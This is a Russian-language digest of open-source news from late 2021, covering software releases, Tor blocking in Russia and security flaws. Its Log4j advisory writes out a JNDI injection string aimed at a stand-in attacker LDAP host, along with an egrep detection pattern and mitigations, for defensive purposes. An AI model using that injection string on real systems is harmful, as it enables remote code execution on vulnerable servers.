Январская история с незаконным доступом в сеть производителя сетевого оборудования Ubiquiti получила неожиданное продолжение. 1 декабря ФБР и прокуратура Нью-Йорка объявили об аресте бывшего сотрудника Ubiquiti Николаса Шарпа (Nickolas Sharp). Ему предъявлены обвинения в незаконном доступе к компьютерным системам, вымогательстве, мошенничестве с использованием телекоммуникационных систем (wire fraud) и даче ложных показаний сотрудникам ФБР.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56279

Организация Blender Foundation опубликовала выпуск свободного пакета 3D-моделирования Blender 3.0, подходящего для решения различных задач, связанных с 3D-моделированием, 3D-графикой, разработкой компьютерных игр, симуляцией, рендерингом, композитингом, трекингом движений, скульптурным моделированием, созданием анимации и монтажом видео. Код распространяется под лицензией GPL. Готовые сборки сформированы для Linux, Windows и macOS.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56282

Состоялся выпуск экспериментальной ветки открытой реализации WinAPI - Wine 6.23. С момента выпуска версии 6.22 было закрыто 48 отчётов об ошибках и внесено 410 изменений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56280

Из кодовой базы Mesa удалены все классические драйверы OpenGL и прекращена поддержка инфраструктуры для их работы. Сопровождение кода старых драйверов будет продолжено в отдельной ветке "Amber", но в основной состав Mesa данные драйверы больше входить не будут. Также из состава удалена классическая библиотека xlib, вместо которой рекомендовано использовать вариант gallium-xlib.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56281

3 декабря, в международный день 3Dшника, состоялся выпуск Blender 3.0. Из наиболее заметных улучшений: Многократное (2—8) ускорение движка рендеринга Cycles на реальных, не синтетических сценах. Более отзывчивое окно просмотра (viewport). OpenImageDenoise обновлен до версии 1.4, что даёт улучшенное сохранение детализации. Подповерхностное рассеивание теперь поддерживает анизотропию, что даёт более реалистичную отрисовку кожи. Появился браузер для простого добавления в сцену различных ресурсов (шейдеры, готовые объекты и т.д.). Добавлена система геометрических узлов (нод), всего доступно порядка 100 узлов для работы кривыми, текстом и т.д. Эта функциональность будет особенно полезна при процедурном моделировании и анимации (например, в motion design). Пользовательский интерфейс обновлён и стал более согласованным и контрастным. Во встроенном видеоредакторе появился предпросмотр видеоклипов на монтажном столе и инструменты трансформации объектов прямо в окне просмотра, количество каналов расширено до 128. Добавлена визуализация контроллеров при использовании 3D-шлема и возможность перемещаться по сцене. Появилась поддержка шлемов Varjo VR-3 и XR-3. Добавлена возможность формировать библиотеку поз для персонажей. Для применения сохранённой позы достаточно перетащить её на персонаж. Внесена масса улучшений в черновой карандаш (grease pencil). Многократно ускорены загрузка и сохранение файлов за счёт перехода с gzip на Zstandard. Добавлен импорт USD, улучшена поддержка Alembic. Все изменения за шесть минут: [ https://www.youtube.com/watch?v=JZIFWEY3l6k ]( https://www.youtube.com/watch?v=JZIFWEY3l6k ) 40-минутная документалка с историями пользователей программы: [ https://www.youtube.com/watch?v=rJ48-SYY1sQ ]( https://www.youtube.com/watch?v=rJ48-SYY1sQ )
Ссылка: https://www.linux.org.ru/news/multimedia/16673582

Опубликован выпуск проекта EndeavourOS 21.4 "Atlantis", пришедшего на смену дистрибутиву Antergos, развитие которого было прекращено в мае 2019 года из-за нехватки у оставшихся мэйнтейнеров свободного времени для поддержания проекта на должном уровне. Размер установочного образа 1.9 ГБ (x86_64, отдельно развивается сборка для ARM).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56284

Джеймс Вестман (James Westman), разработчик приложения GNOME Maps, представил новый язык разметки Blueprint, предназначенный для построения интерфейсов с использованием библиотеки GTK. Код компилятора для преобразования разметки Blueprint в ui-файлы GTK написан на языке Python и распространяется под лицензией LGPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56283

Проект EPEL (Extra Packages for Enterprise Linux), занимающийся поддержанием репозитория дополнительных пакетов для RHEL и CentOS, объявил о создании варианта репозитория для дистрибутивов Red Hat Enterprise Linux 9-beta и CentOS Stream 9. Бинарные сборки формируются для архитектур x86_64, aarch64, ppc64le и s390x.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56285

Вышла новая версия Wine 6.23. Wine – прослойка совместимости приложений для Windows с POSIX-совместимыми ОС, транслирующая вызовы Windows API в вызовы POSIX на лету вместо эмуляции логики Windows вроде виртуальной машины. С момента выпуска версии 6.22 было закрыто 48 отчётов об ошибках и внесено 410 изменений. Важные изменения: драйвер CoreAudio и менеджер точек монтирования (Mount manager) преобразованы в формат Portable Executable; добавлена поддержка обработки исключений в прослойку для запуска 32-разрядных программ в 64-разрядной Windows; реализована возможность использования PE-библиотек, предоставляемых дистрибутивом, вместо библиотек из поставки Wine; исправлена [ ошибка ]( https://bugs.winehq.org/show_bug.cgi?id=51647 ) в GIMP при редактировании скриншотов; улучшения в интерфейсе WineDbg. Исправления связанные с работой игр: Layers of Fear; Internet Chess Club (ICC) Dasher 1.5.8; Rockstar Game Launcher; GTA 1997; Crazy Stone. Исправления связанные с работой приложений: ICC Dasher 1.5.4; Serif WebPlus X8; Accessible Event Watcher; Sookasa; Windows PowerShell Core 6.2 Preview 2; Navicat V15.0.25; Ashlar Vellum/DrawingBoard 1.00; Insta360 pro Stitcher; outSPOKEN 3.0.
Ссылка: https://www.linux.org.ru/news/opensource/16673658

После восьми лет затишья вышла новая версия AssaultCube — бесплатного многопользовательского шутера с открытым исходным кодом, использующего движок [ CUBE ]( http://cubeengine.com/cube.php4 ) . Ключевые особенности: Быстрые аркадные перестрелки в реалистичном окружении. Сетевой код организован таким образом, что можно играть даже на 56 Кб/с соединении. Архив с игрой весит меньше 50 МБ. Доступны версии для Windows, Mac и Linux. Правильно настроенную игру можно запустить даже на старых компьютерах (Pentium III и выше). ( [ читать дальше... ]( https://www.linux.org.ru/news/games/16676276#cut ) )
Ссылка: https://www.linux.org.ru/news/games/16676276

После года разработки опубликован выпуск проекта VeraCrypt 1.25.4, развивающего форк системы шифрования дисковых разделов TrueCrypt, прекратившей своё существование. Разработанный проектом VeraCrypt код распространяется под лицензией Apache 2.0, а заимствования из TrueCrypt продолжают поставляться под лицензией TrueCrypt License 3.0. Готовые сборки формируются для Linux, FreeBSD, Windows и macOS.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56286

Здравствуйте, любители героев меча и магии!После очередного месяца работы над проектом fheroes2, мы бы хотели предложить вам [ версию 0.9.10 ]( https://github.com/ihhub/fheroes2/releases/tag/0.9.10 ) ремастера «Вторых Героев».С этого момента вы можете [ выбрать ]( https://i85.servimg.com/u/f85/20/25/62/08/langua10.png ) один из 4 доступных языков (английский, французский, польский или немецкий), владея лишь одной версией оригинальной игры. В том числе и демо версией! Это стало возможным благодаря тому, что движок теперь может генерировать все символы из других языков, имея лишь один доступный алфавит. У некоторых символов остаются еще шероховатости, но мы на пути к тому, чтобы игроки могли играть в игру на любом доступном языке без поиска соответствующей локализации. К ближайшему релизу мы планируем также добавить и русский язык для выбора, чтобы у нашей аудитории не возникало трудностей поиском нужной оригинальной версии игры.Исправлению подверглись многие места в интерфейсе игры: отцентровано отображение надписей в некоторых окнах, поправлена отрисовка сетки на поле боя, герои игроков теперь отображаются на миникарте (чего не было в оригинале!) и добавлено воспроизведение [ видео ]( https://i85.servimg.com/u/f85/20/25/62/08/pol_se10.png ) в окнах выбора кампании аддона «The Price of Loyalty».Каждый месяц, по мере сил и времени мы вносим изменения в ИИ. И прошедший не стал исключением: в бою использование заклинаний стало более осознанным, а также были исправлены баги с невозможностью высадки на побережье и одержимостью водоворотами.Продолжены работы по внедрению оригинальной логики проходимости возле объектов на карте приключений: в частности изменения коснулись водных объектов и функционирования заклинания "Дверь Измерений".Помимо этого доработаны алгоритмы нахождения пути на карте приключений и полностью воссоздана логика штрафов за передвижение по открытой местности.Работы над локализациями также идут своим чередом: добавлена поддержка итальянского языка и многие упущенные ранее места в других языках обзавелись недостающими переводами.А для пользователей Linux-систем был добавлен скрипт для распаковки ресурсов из DOSBOX версии оригинальной игры.Свыше 60 багов движка было исправлено в рамках перехода к версии 0.9.10!И снова, спасибо за вашу поддержку! Мы надеемся, что новая версия проекта принесет вам еще больше удовольствия от игры в Героев Меча и Магии 2.Разработку проекта можно поддержать на [ Patreon ]( https://www.patreon.com/fheroes2 ) .
Ссылка: https://www.linux.org.ru/news/games/16676721

Штайнар Гундерсон (Steinar H. Gunderson), один из авторов библиотеки сжатия Snappy и участник разработки IPv6, объявил о возвращении в компанию Google, в которой в своё время занимался разработкой сервисов поиска по изображениям и offline-картами, но теперь будет вовлечён в разработку браузера Chrome. До этого Штайнар в течение пяти лет работал в Oracle над модернизацией оптимизатора СУБД MySQL. Заметка Штайнара примечательна критическим отношением к перспективам MySQL и рекомендацией переходить на PostgreSQL.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56287

Организация The Document Foundation объявила о выходе корректирующих выпусков свободного офисного пакета LibreOffice 7.2.4 и 7.1.8, в которых до версии 3.73.0 обновлена поставляемая в комплекте криптографическая библиотека NSS. Обновление связано с устранением в NSS критичкской уязвимости (CVE-2021-43527), которую можно эксплуатировать через LibreOffice. Уязвимость позволяет организовать выполнение своего кода при верификации специально оформленной цифровой подписи документа. Выпуски отнесены к категории hotfix и содержат только одно изменение.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56289

После восьми месяцев разработки опубликован релиз свободного гипервизора Xen 4.16. В разработке нового выпуска приняли участие такие компании, как Amazon, Arm, Bitdefender, Citrix и EPAM Systems. Выпуск обновлений для ветки Xen 4.16 продлится до 2 июня 2023 года, а публикация исправлений уязвимостей до 2 декабря 2024 года.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56278

Компания Quad9 опубликовала решение суда в отношении апелляции, поданной в ответ на судебное предписание о блокировке пиратских сайтов на уровне публичных DNS-резолверов Quad9. Суд отказался удовлетворить апелляцию и не поддержал требование о приостановке судебного запрета, ранее вынесенного по делу, инициированному компанией Sony Music. Представители Quad9 заявили, что не остановятся и попытаются обжаловать решение в суде высшей инстанции, а также направят апелляцию в защиту интересов других пользователей и организаций, на которых могут повлиять подобные блокировки.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56291

Доступен выпуск проекта fheroes2 0.9.10, пытающегося воссоздать игру Heroes of Might and Magic II. Код проекта написан на C++ и распространяется под лицензией GPLv2. Для запуска игры требуются файлы с игровыми ресурсами, которые можно получить, например, из демо-версии Heroes of Might and Magic II.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56290

Из кодовой базы Mesa удалены все классические драйверы OpenGL и прекращена поддержка инфраструктуры для их работы. Сопровождение кода старых драйверов будет продолжено в отдельной ветке «Amber», но в основной состав Mesa данные драйверы больше входить не будут. Изменение затрагивает все остававшиеся в составе Mesa драйверы, не использовавшие интерфейс Gallium3D, включая драйверы i915 и i965 для GPU Intel, r100 и r200 для GPU AMD и Nouveau для GPU NVIDIA. Вместо указанных драйверов рекомендуется использовать драйверы на основе архитектуры Gallium3D, такие как Iris (Gen 8+) и Crocus (Gen4-Gen7) для GPU Intel, radeonsi и r600 для карт AMD, nvc0 и nv50 для карт NVIDIA. Удаление классических драйверов приведёт к прекращению поддержки некоторых старых GPU Intel (Gen2, Gen3), AMD Radeon R100 и R200 и старых карт NVIDIA. Источник — портал opennet.ru.
Ссылка: https://www.linux.org.ru/news/hardware/16677338

[ Представлен ]( https://www.nzyme.org/blog/nzyme-v1-2-0-peck-slip-has-been-released/ ) выпуск инструментария [ Nzyme 1.2.0 ]( https://www.nzyme.org/ ) , предназначенного для мониторинга эфира беспроводных сетей с целью выявления вредоносной активности, развёртывания подставных точек доступа, неавторизированных подключений и совершения типовых атак. Код проекта написан на языке Java и [ распространяется ]( https://github.com/lennartkoopmann/nzyme ) под лицензией SSPL (Server Side Public License), которая основана AGPLv3, но не является открытой из-за наличия дискриминирующих требований в отношении использования продукта в облачных сервисах. Захват трафика осуществляется через перевод беспроводного адаптера в режим мониторинга за транзитными сетевыми кадрами. Возможна передача перехваченных сетевых кадров в систему [ Graylog ]( https://www.graylog.org/ ) для длительного хранения на случай, если данные потребуются для разбора инцидентов и вредоносных действий. Например, программа позволяет выявить появление несанкционированных точек доступа, а в случае выявления попытки компрометации беспроводной сети покажет, кто стал целью атаки и какие пользователи были скомпрометированы. Система может генерировать несколько типов предупреждений, а также поддерживает различные способы определения аномальной активности, включая проверку компонентов сети по fingerprint-идентификаторам и создание ловушек. Поддерживается генерация предупреждений при нарушении структуры сети (например, появления ранее не известного BSSID), изменении связанных с безопасностью параметров сети (например, изменение режимов шифрования), выявления присутствия типовых устройств для проведения атак (например, WiFi Pineapple), фиксации обращения к ловушке или определения аномального изменения поведения (например, при появлении отдельных кадров с нетипичным слабым уровнем сигнала или нарушением пороговых значений интенсивности поступления пакетов). Помимо анализа вредоносной активности система может применяться для общего мониторинга за беспроводными сетями, а также для физического обнаружения источника выявленных аномалий через использование трекеров, позволяющих поступательно определить вредоносное беспроводное устройство на основании специфичных для него атрибутов и изменения уровня сигнала. Управление производится через web-интерфейс.
Ссылка: https://www.linux.org.ru/news/opensource/16678646

История с возникновением проблем с подключением к сети Tor в Москве и некоторых других крупных городах РФ получила продолжение. Jérôme Charaoui из команды сисадминов проекта Tor опубликовал письмо от Роскомнадзора, перенаправленное немецким хостинг-оператором Hetzner, в сети которого находится одно из зеркал сайта torproject.org. Напрямую проект писем не получал и достоверность отправителя пока под вопросом. В письме указывается на внесение сайта www.torproject.org в единый реестр доменных имён, применяемый для идентификации сайтов, содержащих информацию, запрещённую для распространения в Российской Федерации.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56298

Организации Apache Software Foundation представила интегрированную среду разработки Apache NetBeans 12.6, которая предоставляет поддержку языков программирования Java SE, Java EE, PHP, C/C++, JavaScript и Groovy.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56294

Состоялся релиз web-браузера Firefox 95. Кроме того, сформировано обновление ветки с длительным сроком поддержки - 91.4.0. На стадию бета-тестирования в ближайшее время будет переведена ветка Firefox 96, релиз которой намечен на 11 января.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56299

Мигель Охеда (Miguel Ojeda), автор проекта Rust-for-Linux, предложил для рассмотрения разработчиками ядра Linux третий вариант компонентов для разработки драйверов устройств на языке Rust. Поддержка Rust рассматривается как экспериментальная, но уже согласована для включения в ветку linux-next. Разработка финансируется компанией Google и организацией ISRG (Internet Security Research Group), которая является учредителем проекта Let's Encrypt и способствует продвижению HTTPS и развитию технологий для повышения защищённости интернета.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56295

Представлен выпуск инструментария Nzyme 1.2.0, предназначенного для мониторинга эфира беспроводных сетей с целью выявления вредоносной активности, развёртывания подставных точек доступа, неавторизированных подключений и совершения типовых атак. Код проекта написан на языке Java и распространяется под лицензией SSPL (Server Side Public License), которая основана AGPLv3, но не является открытой из-за наличия дискриминирующих требований в отношении использования продукта в облачных сервисах.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56296

[ Доступен ]( https://download-installer.cdn.mozilla.net/pub/firefox/releases/95.0/ ) релиз Firefox 95. Новая версия примечательна улучшенной поддержкой Wayland, реализацией механизма изоляции кода сторонних библиотек [ RLBox ]( https://hacks.mozilla.org/2021/12/webassembly-and-back-again-fine-grained-sandboxing-in-firefox-95/ ) , а также вынесением обработки каждого сайта в отдельный процесс (проект Fission). ( [ читать дальше... ]( https://www.linux.org.ru/news/mozilla/16679264#cut0 ) )>>> [ Примечания к выпуску для разработчиков ]( https://developer.mozilla.org/Firefox/Releases/95 ) >>> [ Все исправленные в этом выпуске ошибки ]( https://bugzilla.mozilla.org/buglist.cgi?query_format=advanced&resolution=FIXED&target_milestone=95%20Branch&limit=0 )
Ссылка: https://www.linux.org.ru/news/mozilla/16679264

Состоялся выпуск открытой системы синтеза речи RHVoice 1.6.0, изначально развивавшейся для обеспечения качественной поддержки русского языка, но затем адаптированной и для других языков, включая английский, португальский, украинский, киргизский, татарский и грузинский. Код написан на С++ и распространяется под лицензией LGPL 2.1. Поддерживается работа в GNU/Linux, Windows и Android. Программа совместима с типовыми TTS-интерфейсами (text-to-speech) для преобразования текста в речь: SAPI5 (Windows), Speech Dispatcher (GNU/Linux) и Android Text-To-Speech API, но также может использоваться в экранном ридере NVDA. Создателем и основным разработчиком RHVoice является Ольга Яковлева, которая развивает проект несмотря на полную слепоту.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56305

Для реализации в Fedora Linux 36 намечен переход на использование по умолчанию сеанса GNOME на базе протокола Wayland на системах с проприетарными драйверами NVIDIA. Возможность выбора сеанса GNOME, работающего поверх традиционного X-сервера, продолжит предоставляться как и раньше. Изменение пока не рассмотрено комитетом FESCo (Fedora Engineering Steering Committee), отвечающим за техническую часть разработки дистрибутива Fedora Linux.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56307

В связи с участившимися случаями захвата репозиториев крупных проектов и продвижения вредоносного кода через компрометацию учётных записей разработчиков, компания GitHub вводит повсеместную расширенную верификацию учётных записей. Отдельно для сопровождающих и администраторов 500 самых популярных NPM-пакетов в начале следующего года будет внедрена обязательная двухфакторная аутентификация.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56304

Роскомнадзор официально внёс изменения в единый реестр запрещённых сайтов, блокирующие доступ к сайту www.torproject.org. В реестр внесены все IPv4 и IPv6 адреса основного сайта проекта, но дополнительные сайты, не связанные с распространением Tor Browser, например, blog.torproject.org, forum.torproject.net и gitlab.torproject.org, остаются доступны. Блокировка также не коснулась официальных зеркал, таких как tor.eff.org, gettor.torproject.org и tb-manual.torproject.org. Версия для платформы Android продолжает распространяться через каталог Google Play.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56303

Представлен релиз FreeBSD 12.3, который опубликован для архитектур amd64, i386, powerpc, powerpc64, powerpcspe, sparc64 и armv6, armv7 и aarch64. Дополнительно подготовлены образы для систем виртуализации (QCOW2, VHD, VMDK, raw) и облачных окружений Amazon EC2. Релиз FreeBSD 13.1 ожидается весной 2022 года.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56292

Доступен релиз дистрибутива Calculate Linux 22, развиваемого русскоязычным сообществом, построенного на основе Gentoo Linux, поддерживающего непрерывный цикл выпуска обновлений и оптимизированного для быстрого развёртывания в корпоративной среде. В новой версии реализована возможность доведения до актуального состояния давно не обновлявшихся систем, выполнен перевод утилит Calculate на Python 3 и по умолчанию задействован звуковой сервер PipeWire.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56308

Мы рады представить вашему вниманию релиз Calculate Linux 22! В новой версии решена проблема с обновлением системы спустя длительный период времени, утилиты Calculate портированы на Python 3, по умолчанию используется звуковой сервер PipeWire. Для загрузки [ доступны ]( https://wiki.calculate-linux.org/ru/download ) следующие редакции дистрибутива: Calculate Linux Desktop с рабочим столом KDE (CLD), Cinnamon (CLDC), LXQt (CLDL), Mate (CLDM) и Xfce (CLDX и CLDXS), Calculate Directory Server (CDS), Calculate Linux Scratch (CLS) и Calculate Scratch Server (CSS). Если у вас уже установлен Calculate Linux, просто обновите вашу систему до версии CL22. ( [ читать дальше... ]( https://www.linux.org.ru/news/calculate-linux/16680062#cut ) )
Ссылка: https://www.linux.org.ru/news/calculate-linux/16680062

Проект Tor [ опубликовал ]( https://blog.torproject.org/tor-censorship-in-russia/ ) официальное объявление о ситуации с блокировками в России: Пользователям рекомендуется использовать мостовые узлы. Россия находится на втором месте по числу пользователей Tor (14 % из всех пользователей Tor), уступая лишь США (20,98 %). Для того чтобы помочь в обходе блокировок в РФ представителям сообщества предлагается принять участие в создании новых мостовых узлов. В настоящее время насчитывается около 1600 подобных узлов, из которых 1100 можно использовать с транспортом obfs4.
Ссылка: https://www.linux.org.ru/news/internet/16679521

Представлен релиз FreeBSD 12.3. ( [ читать дальше... ]( https://www.linux.org.ru/news/bsd/16681123#cut0 ) )Релиз FreeBSD 13.1 ожидается весной 2022 года.Источник — портал opennet.ru.
Ссылка: https://www.linux.org.ru/news/bsd/16681123

Компания Mozilla опубликовала финансовый отчет за 2020 год. В 2020 году доходы Mozilla уменьшились почти в два раза и составили 496.86 млн долларов, что примерно соответствует показателям 2018 года. Для сравнения, в 2019 году компания Mozilla заработала 828 млн долларов, в 2018 году - 450 млн долларов, в 2017 - 562 млн долларов, в 2016 году - 520 млн долларов, в 2015 - 421 млн долларов, в 2014 - 329 млн долларов, в 2013 - 314 млн, 2012 - 311 млн.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56314

Представлен релиз специализированного браузера Tor Browser 11.0.2, сосредоточенного на обеспечении анонимности, безопасности и приватности. При использовании Tor Browser весь трафик перенаправляется только через сеть Tor, а обратиться напрямую через штатное сетевое соединение текущей системы невозможно, что не позволяет отследить реальный IP-адрес пользователя (в случае взлома браузера, атакующие могут получить доступ к системным параметрам сети, поэтому для полного блокирования возможных утечек следует использовать такие продукты, как Whonix). Сборки Tor Browser подготовлены для Linux, Windows и macOS.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56312

Доступен релиз открытой биллинговой системы ABillS 0.92, компоненты которой поставляются под лицензией GPLv2.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56313

Опубликован выпуск мобильной платформы KDE Plasma Mobile 21.12, основанной на мобильной редакции рабочего стола Plasma 5, библиотеках KDE Frameworks 5, телефонном стеке ModemManager и коммуникационном фреймворке Telepathy. Для вывода графики в Plasma Mobile используется композитный сервер kwin_wayland, а для обработки звука применяется PulseAudio. Одновременно подготовлен выпуск набора мобильных приложений Plasma Mobile Gear 21.12, формируемого по аналогии с набором KDE Gear. Для создания интерфейса приложений применяется Qt, набор компонентов Mauikit и фреймворк Kirigami из состава KDE Frameworks, позволяющий создавать универсальные интерфейсы, пригодные для смартфонов, планшетов и ПК.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56310

Компания Microsoft представила открытый пакет Microsoft-Performance-Tools для анализа производительности и диагностики связанных с производительностью проблем на платформах Linux и Android. Для работы предлагается набор утилит командной строки для анализа производительности всей системы и профилирования отдельных приложений. Код написан на языке C# с использованием платформы .NET Core и распространяется под лицензией MIT.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56315

Компания MariaDB, курирующая вместе с одноимённой некоммерческой организацией разработку сервера баз данных MariaDB, аносировала существенное изменение графика формирования сборок MariaDB Community Server и схемы его поддержки. До сих пор компания MariaDB формировала одну значительную ветку раз в год и обеспечивала её сопровождение на протяжении примерно 5 лет. По новой схеме значительные релизы, содержащие функциональные изменения, будут выходить раз в квартал и поддерживаться всего лишь год.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56317

В репозитории NPM выявлено 17 вредоносных пакетов, которые распространялись с использованием тайпсквоттинга, т.е. с назначением имён похожих на названия популярных библиотек с расчётом на то, что пользователь допустит опечатку при наборе имени или не заметит различий, выбирая модуль из списка.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56318

В Apache Log4j 2, популярном фреймворке для организации ведения логов в Java-приложениях, выявлена критическая уязвимость, позволяющая выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56319

Доминик Саблевски представил новый и невероятно простой в реализации формат изображений QOI (Quite OK Image). По представленным тестам, при сжатии изображений QOI производительнее PNG в 20–30 раз, а при распаковке — в 3–4 раза. Доминик признаётся, что не является экспертом в области сжатия изображений. Идея создать новый простой и эффективный формат изображений пришла к нему во времена работы с MPEG-1. Его целью была скорость и простота. Файлы QOI больше по размеру, чем PNG на 10–50 % в зависимости от картинки, поэтому QOI стоит применять, когда необходима скорость. Исходный код на C, состоящий из одного универсального файла, доступен на [ GitHub ]( https://github.com/phoboslab/qoi ) . В данный момент формат проходит обсуждение [ финальной спецификации ]( https://github.com/phoboslab/qoi/issues/48 ) с заинтересованными пользователями. Также доступны реализации на [ Zig ]( https://github.com/MasterQ32/zig-qoi ) , [ Rust ]( https://github.com/steven-joruk/qoi ) , [ Go ]( https://github.com/xfmoulet/qoi ) , [ TypeScript ]( https://github.com/panzi/jsqoi ) , [ Python ]( https://github.com/kodonnell/qoi ) , [ C# ]( https://github.com/NUlliiON/QoiSharp ) . Поддержка QOI добавлена в библиотеку [ SAIL ]( https://github.com/HappySeaFox/sail ) . Для пользователей Arch Linux в AUR доступен пакет [ qoi-git ]( https://aur.archlinux.org/pkgbase/qoi-git/ ) . >>> [ Замеры скорости и размеров изображений ]( https://phoboslab.org/files/qoibench )
Ссылка: https://www.linux.org.ru/news/multimedia/16683754

Опубликован релиз проекта Cambalache 0.8.0, развивающего инструмент быстрой разработки интерфейсов для GTK 3 и GTK 4, использующий парадигму MVC и философию первостепенного значения модели данных. В отличии от Glade в Cambalache предоставляется поддержка ведения нескольких интерфейсов пользователя в одном проекте. По функциональным возможностям выпуск Cambalache 0.8.0 отмечается как близкий к паритету с Glade. Код написан на Python и поставляется под лицензией GPLv2.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56321

Состоялся стабильный релиз протокола, механизма межпроцессного взаимодействия и библиотек Wayland 1.20. Ветка 1.20 обратно совместима на уровне API и ABI с выпусками 1.x и содержит в основном исправления ошибок и незначительные обновления протокола. Композитный сервер Weston, предоставляющий код и рабочие примеры для использования Wayland в десктоп-окружениях и встраиваемых решениях, развивается в рамках отдельного цикла разработки.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56320

Увидел свет релиз дистрибутива Kali Linux 2021.4, предназначенного для тестирования систем на предмет наличия уязвимостей, проведения аудита, анализа остаточной информации и выявления последствий атак злоумышленников. Все оригинальные наработки, созданные в рамках дистрибутива, распространяются под лицензией GPL и доступны через публичный Git-репозиторий. Для загрузки подготовлены несколько вариантов iso-образов, размером 466 МБ, 3.1 ГБ и 3.7 ГБ. Сборки доступны для архитектур i386, x86_64, ARM (armhf и armel, Raspberry Pi, Banana Pi, ARM Chromebook, Odroid). По умолчанию предлагается рабочий стол Xfce, но опционально поддерживаются KDE, GNOME, MATE, LXDE и Enlightenment e17.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56324

Европейская комиссия утвердила новые правила в отношении открытого программного обеспечения, в соответствии с которыми разработанные по заказу Еврокомиссии программные решения, представляющие потенциальную пользу для жителей, компаний и государственных учреждений, будут доступны всем желающим под открытыми лицензиями. Правила также упрощают перевод в разряд открытых уже существующих программных продуктов, принадлежащих Еврокомиссии, и уменьшают связанную с данным процессом бумажную волокиту.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56325

Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов. Уязвимость является крайне опасной ввиду следующих причин: Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit. Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: Как бороться Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender. Проверить журнал приложения на предмет предпринятых атак можно при помощи egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath. Ссылки Официальная страница Log4j: [ https://logging.apache.org/log4j/2.x/ ]( https://logging.apache.org/log4j/2.x/ ) Log4j RCE Exploitation Detection: [ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ]( https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ) JNDIExploit: [ https://github.com/feihong-cs/JNDIExploit ]( https://github.com/feihong-cs/JNDIExploit ) Как работает JNDI Injection: [ https://www.veracode.com/blog/research/exploiting-jndi-injections-java ]( https://www.veracode.com/blog/research/exploiting-jndi-injections-java )
Ссылка: https://www.linux.org.ru/news/security/16685022

В открытой платформе визуализации данных Grafana выявлена уязвимость (CVE-2021-43798), позволяющая выйти за пределы базового каталога и получить доступ к произвольным файлам в локальной файловой системе сервера, насколько это позволяют права доступа пользователя, под которым выполняется Grafana. Проблема вызвана некорректной работой обработчика пути "/public/plugins/‹plugin-id›/", в котором допускалось использование символов ".." для доступа к нижележащим каталогам.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56329

Началось тестирование первого кандидата в релизы Wine 7.0, открытой реализации WinAPI. Кодовая база переведена на стадию заморозки перед релизом, который ожидается в середине января. По сравнению с выпуском Wine 6.23 закрыто 32 отчёта об ошибках и внесено 211 изменений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56327